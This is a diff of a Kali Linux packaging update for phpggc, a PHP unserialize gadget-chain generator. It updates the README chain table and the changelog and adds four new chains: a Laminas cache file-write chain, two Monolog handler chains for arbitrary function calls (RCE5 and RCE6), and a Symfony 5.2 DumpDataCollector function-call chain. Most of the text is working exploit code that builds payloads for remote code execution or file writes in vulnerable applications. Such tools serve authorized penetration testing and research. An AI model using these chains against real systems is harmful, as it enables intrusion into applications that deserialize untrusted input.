Codebase list phpggc / d89026c5-ddf4-439a-b882-0a351c2603e1/main
New upstream release. Kali Janitor 2 years ago
10 changed file(s) with 366 addition(s) and 3 deletion(s). Raw diff Collapse all Expand all
+7
-3
README.md less more
3131 Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct *
3232 Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct *
3333 Laminas/FD1 <= 2.11.2 File delete __destruct
34 Laminas/FW1 2.8.0 <= 3.0.x-dev File write __destruct *
3435 Laravel/RCE1 5.4.27 RCE (Function call) __destruct
3536 Laravel/RCE2 5.5.39 RCE (Function call) __destruct
3637 Laravel/RCE3 5.5.39 RCE (Function call) __destruct *
4041 Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct *
4142 Magento/FW1 ? <= 1.9.4.0 File write __destruct *
4243 Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct
43 Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct
44 Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct
45 Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct
44 Monolog/RCE1 1.4.1<=1.6.1 & 1.17.2<=2.2.0+ RCE (Function call) __destruct
45 Monolog/RCE2 1.4.1 <= 2.2.0+ RCE (Function call) __destruct
46 Monolog/RCE3 1.0.2 <= 1.10.0 RCE (Function call) __destruct
4647 Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct *
48 Monolog/RCE5 1.25 <= 2.2.0+ RCE (Function call) __destruct *
49 Monolog/RCE6 1.10.0 <= 2.2.0+ RCE (Function call) __destruct *
4750 Phalcon/RCE1 <= 1.2.2 RCE __wakeup *
4851 PHPCSFixer/FD1 <= 2.17.3 File delete __destruct
4952 PHPCSFixer/FD2 <= 2.17.3 File delete __destruct
6669 Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct *
6770 Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct *
6871 Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct *
72 Symfony/RCE5 5.2.* RCE (Function call) __destruct
6973 TCPDF/FD1 <= 6.3.5 File delete __destruct *
7074 ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct *
7175 WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct *
+6
-0
debian/changelog less more
0 phpggc (0.20210606-0kali1) UNRELEASED; urgency=low
1
2 * New upstream release.
3
4 -- Kali Janitor <[email protected]> Mon, 07 Jun 2021 09:27:36 -0000
5
06 phpggc (0.20210218-0kali1) kali-dev; urgency=medium
17
28 * Configure debian/watch to track git master
+39
-0
gadgetchains/Laminas/FW/1/chain.php less more
0 <?php
1
2 namespace GadgetChain\Laminas;
3
4 use Laminas\Cache\Psr\CacheItemPool\{CacheItem, CacheItemPoolDecorator};
5 use Laminas\Cache\Storage\Adapter\{Filesystem, FilesystemOptions};
6
7 class FW1 extends \PHPGGC\GadgetChain\FileWrite
8 {
9 public static $version = '2.8.0 <= 3.0.x-dev';
10 public static $vector = '__destruct';
11 public static $author = 'swapgs';
12 public static $information = '
13 This chain requires both laminas/laminas-cache (tested up to 3.0.x-dev) and
14 laminas/laminas-cache-storage-adapter-filesystem (a default dependency) to work.
15 Asking for a remote filename without extension will create a file with a trailing dot
16 (e.g. asking for `foo` will create `foo.`)
17 ';
18
19 public function process_parameters($parameters)
20 {
21 $parameters = parent::process_parameters($parameters);
22 $infos = pathinfo($parameters['remote_path']);
23 $parameters['extension'] = isset($infos['extension']) ? $infos['extension'] : '';
24 $parameters['filename'] = isset($infos['filename']) ? $infos['filename'] : '';
25 $parameters['dirname'] = dirname($parameters['remote_path']);
26 return $parameters;
27 }
28
29 public function generate(array $parameters)
30 {
31 return new CacheItemPoolDecorator(
32 new Filesystem(
33 new FilesystemOptions($parameters['dirname'], $parameters['extension'])
34 ),
35 [new CacheItem($parameters['filename'], $parameters['data'])]
36 );
37 }
38 }
+69
-0
gadgetchains/Laminas/FW/1/gadgets.php less more
0 <?php
1
2 namespace Laminas\Cache\Storage\Adapter
3 {
4 class AdapterOptions
5 {
6 protected $namespace;
7 protected $keyPattern;
8
9 function __construct()
10 {
11 $this->namespace = '';
12 $this->keyPattern = '/.*/';
13 }
14 }
15
16 class FilesystemOptions extends AdapterOptions
17 {
18 protected $cacheDir;
19 protected $dirLevel;
20 protected $suffix;
21
22 function __construct($cacheDir, $extension)
23 {
24 parent::__construct();
25 $this->cacheDir = $cacheDir;
26 $this->suffix = $extension;
27 $this->dirLevel = 0;
28 }
29 }
30
31 class Filesystem
32 {
33 protected $options;
34
35 function __construct($options)
36 {
37
38 $this->options = $options;
39 }
40 }
41 }
42
43 namespace Laminas\Cache\Psr\CacheItemPool
44 {
45 class CacheItemPoolDecorator
46 {
47 protected $storage;
48 protected $deferred;
49
50 function __construct($storage, $deferred)
51 {
52 $this->storage = $storage;
53 $this->deferred = $deferred;
54 }
55 }
56
57 class CacheItem
58 {
59 protected $key;
60 protected $value;
61
62 function __construct($key, $value)
63 {
64 $this->key = $key;
65 $this->value = $value;
66 }
67 }
68 }
+19
-0
gadgetchains/Monolog/RCE/5/chain.php less more
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.25 <= 2.2.0+';
7 public static $vector = '__destruct';
8 public static $author = 'mayfly';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14 return new \Monolog\Handler\FingersCrossedHandler($parameter,
15 new \Monolog\Handler\GroupHandler($function)
16 );
17 }
18 }
+30
-0
gadgetchains/Monolog/RCE/5/gadgets.php less more
0 <?php
1
2 namespace Monolog\Handler
3 {
4 // killchain :
5 // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <GroupHandler>handleBatch($records)
6
7 class FingersCrossedHandler {
8 protected $passthruLevel;
9 protected $buffer = array();
10 protected $handler;
11
12 public function __construct($param, $handler)
13 {
14 $this->passthruLevel = 0;
15 $this->buffer = ['test' => [$param, 'level' => null]];
16 $this->handler = $handler;
17 }
18
19 }
20
21 class GroupHandler {
22 protected $processors = array();
23 public function __construct($function)
24 {
25 $this->processors = ['current', $function];
26 }
27
28 }
29 }
+19
-0
gadgetchains/Monolog/RCE/6/chain.php less more
0 <?php
1
2 namespace GadgetChain\Monolog;
3
4 class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.10.0 <= 2.2.0+';
7 public static $vector = '__destruct';
8 public static $author = 'mayfly';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14 return new \Monolog\Handler\FingersCrossedHandler($parameter,
15 new \Monolog\Handler\BufferHandler($function)
16 );
17 }
18 }
+40
-0
gadgetchains/Monolog/RCE/6/gadgets.php less more
0 <?php
1
2 namespace Monolog\Handler
3 {
4 // killchain :
5 // <abstract>__destruct() => <FingersCrossedHandler>close() => <FingersCrossedHandler>flushBuffer() => <GroupHandler>handleBatch($records)
6
7 class FingersCrossedHandler {
8 protected $passthruLevel;
9 protected $buffer = array();
10 protected $handler;
11
12 public function __construct($param, $handler)
13 {
14 $this->passthruLevel = 0;
15 $this->buffer = ['test' => [$param, 'level' => null]];
16 $this->handler = $handler;
17 }
18
19 }
20
21 class BufferHandler
22 {
23 protected $handler;
24 protected $bufferSize = -1;
25 protected $buffer;
26 # ($record['level'] < $this->level) == false
27 protected $level = null;
28 protected $initialized = true;
29 # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false
30 protected $bufferLimit = -1;
31 protected $processors;
32
33 function __construct($function)
34 {
35 $this->processors = ['current', $function];
36 }
37 }
38
39 }
+19
-0
gadgetchains/Symfony/RCE/5/chain.php less more
0 <?php
1
2 namespace GadgetChain\Symfony;
3
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '5.2.*';
7 public static $vector = '__destruct';
8 public static $author = 'byc_404';
9
10 public function generate(array $parameters)
11 {
12 $function = $parameters['function'];
13 $parameter = $parameters['parameter'];
14
15
16 return new \Symfony\Component\HttpKernel\DataCollector\DumpDataCollector($function, $parameter);
17 }
18 }
+118
-0
gadgetchains/Symfony/RCE/5/gadgets.php less more
0 <?php
1
2 namespace Symfony\Component\Cache\Adapter
3 {
4 class ProxyAdapter
5 {
6 private $createCacheItem;
7 private $namespace;
8 private $pool;
9
10 public function __construct($createCacheItem, $pool)
11 {
12 $this->createCacheItem = $createCacheItem;
13 $this->pool = $pool;
14 $this->namespace = '';
15 }
16 }
17
18
19 class NullAdapter
20 {
21 private $createCacheItem;
22
23 public function __construct($createCacheItem)
24 {
25 $this->createCacheItem = $createCacheItem;
26 }
27 }
28 }
29
30 namespace Symfony\Component\Console\Helper
31 {
32 class Dumper
33 {
34 private $handler;
35
36 public function __construct($handler)
37 {
38 $this->handler = $handler;
39 }
40 }
41 }
42
43
44 namespace Symfony\Component\Cache\Traits
45 {
46 class RedisProxy
47 {
48 private $redis;
49 private $initializer;
50
51 public function __construct($initializer, $redis)
52 {
53 $this->initializer = $initializer;
54 $this->redis = $redis;
55 }
56 }
57 }
58
59 namespace Symfony\Component\Form
60 {
61
62 class FormErrorIterator
63 {
64 public $form;
65 private $errors;
66
67 function __construct($errors, $form)
68 {
69 $this->errors = $errors;
70 $this->form = $form;
71 }
72 }
73 }
74
75
76 namespace Symfony\Component\HttpKernel\DataCollector
77 {
78 class DumpDataCollector
79 {
80 protected $data;
81 private $stopwatch;
82 private $fileLinkFormat;
83 private $dataCount = 0;
84 private $isCollected = false;
85 private $clonesCount = 0;
86 private $clonesIndex = 0;
87
88 public function __construct($function, $command)
89 {
90 $this->data = [
91 [
92 "data" => "1",
93 "name" => new \Symfony\Component\Form\FormErrorIterator([
94 new \Symfony\Component\Form\FormErrorIterator(
95 [],
96 new \Symfony\Component\Cache\Traits\RedisProxy(
97 new \Symfony\Component\Console\Helper\Dumper([
98 new \Symfony\Component\Cache\Adapter\ProxyAdapter(
99 'dd', // exit function
100 new \Symfony\Component\Cache\Adapter\NullAdapter($function)
101 ),
102 "getItem"
103 ]),
104 $command
105 )
106 )],
107 null
108 ),
109 "file" => "3",
110 "line" => "4"
111 ],
112 null,
113 null
114 ];
115 }
116 }
117 }